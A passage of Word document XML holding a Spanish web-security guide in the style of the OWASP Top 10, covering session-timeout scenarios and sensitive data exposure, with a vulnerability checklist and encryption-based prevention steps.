          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D86C8E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D86C8E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La mayoría de los ataques de autenticación ocurren debido al uso de contraseñas como único factor. Las mejores prácticas de la rotación y complejidad de las contraseñas desalientan el uso de claves débiles por parte de los usuarios.</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D86C8E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D86C8E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Los tiempos de vida de las sesiones de aplicación no están configurados correctamente. Un usuario utiliza una computadora pública para acceder a una aplicación. En lugar de seleccionar “logout”, el usuario simplemente cierra </w:t>
            </w:r>
            <w:r w:rsidRPr="00D86C8E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>la pestaña del navegador y se aleja. Un atacante usa el mismo navegador una hora más tarde, la sesión continua activa y el usuario se encuentra autenticado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E88CC6A" wp14:editId="4116F62B">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64844</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>5080</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1409897" cy="876422"/>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546BB6.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId78">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1409897" cy="876422"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exposición de datos sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="001F316B" w:rsidRDefault="00912EEA" w:rsidP="001F316B">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F316B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Muchas aplicaciones web y APIs no protegen adecuadamente datos sensibles, tales como información financiera, de salud o información personalmente identificable (PII). Los atacantes pueden robar o modificar estos datos protegidos inadecuadamente para llevar a cabo fraudes con tarjetas de crédito, robos de identidad u otros delitos. Los datos sensibles requieren métodos de protección adicionales, como el cifrado en almacenamiento y tránsito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28EEAC89" wp14:editId="675DC03C">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-69215</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-41489</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8143176" cy="819398"/>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54D373.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8143176" cy="819398"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="000466D3" w:rsidRPr="00912EEA" w:rsidRDefault="000466D3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">En lugar de atacar la criptografía, los atacantes roban claves, ejecutan ataques Man in the Middle o roban datos en texto plano del servidor, en tránsito, o desde el cliente. Se requiere un ataque manual pero pueden utilizarse bases de datos con </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>hashes que han sido hechas públicas para obtener las contraseñas originales utilizando GPUs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">En los últimos años, este ha sido el ataque de mayor impacto. El error más común es simplemente  no cifrar los datos sensibles. Cuando se emplea criptografía, es común la generación y gestión de claves, algoritmos, cifrados y protocolos débiles. En particular algoritmos débiles de </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>hashing para el almacenamiento de contraseñas. Para los datos en tránsito las debilidades son fáciles de detectar mientras que para los datos almacenados es muy difícil. Ambos tienen una explotabilidad muy variable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Los fallos con frecuencia comprometen datos que deberían estar protegidos. Típicamente, esta información incluye información personal sensible, como registros de salud, datos personales, credenciales y tarjetas de crédito, </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>que a menudo requieren mayor protección según lo definido por las leyes o reglamentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Lo primero es determinar las necesidades de protección de los datos  en tránsito y en almacenamiento. Por ejemplo, contraseñas, números de tarjetas de crédito, registros médicos, información personal y datos sensibles del negocio requieren protección adicional, especialmente si se encuentran en el ámbito de aplicación de leyes de privacidad, como por ejemplo el Reglamento General de Protección de Datos (RGPD) o regulaciones financieras, como PCI Data Security Standard (PCI DSS). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Para todos estos datos:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">¿Se transmite datos en texto claro? Esto se refiere a protocolos como HTTP, SMTP, TELNET, FTP. El </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>tráfico en Internet es especialmente peligroso. Verifique también todo el tráfico interno, por ejemplo, entre los balanceadores de carga, servidores web o sistemas de Backend.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿Se utilizan algoritmos criptográficos obsoletos o débiles, ya sea por defecto o en código heredado? Por ejemplo MD5, SHA1, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿se utilizan claves criptográficas predeterminadas, se generan o reutilizan claves criptográficas débiles, o falta una gestión o rotación adecuada de las claves?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Por defecto, ¿Se aplica cifrado? ¿se estableció las directivas de seguridad o encabezados para el navegador web?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00AF7A8D" w:rsidRDefault="00912EEA" w:rsidP="00AF7A8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El user-agent del usuario (aplicación o cliente de correo), verifica que el certificado envia</w:t>
            </w:r>
            <w:r w:rsidR="00AF7A8D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>do por el servidor sea válido.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF7A8D" w:rsidRDefault="00AF7A8D" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF7A8D" w:rsidRPr="00912EEA" w:rsidRDefault="00AF7A8D" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Clasifique los datos procesados, almacenados o transmitidos por el sistema. Identifique que información es sensible de acuerdo a las regulaciones, leyes o requisitos del negocio y del país.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aplique los controles adecuados para cada clasificación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No almacene datos sensibles innecesarios.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cifre todos los datos sensibles cuando sean almacenados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cifre todos los datos en tránsito utilizando protocolos seguros como TLS con cifradores que utilicen Perfect Forward Secrecy (PFS), priorizando </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>los algoritmos en el servidor. Aplique el cifrado utilizando directivas como HTTP Strict Transport Security (HSTS).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
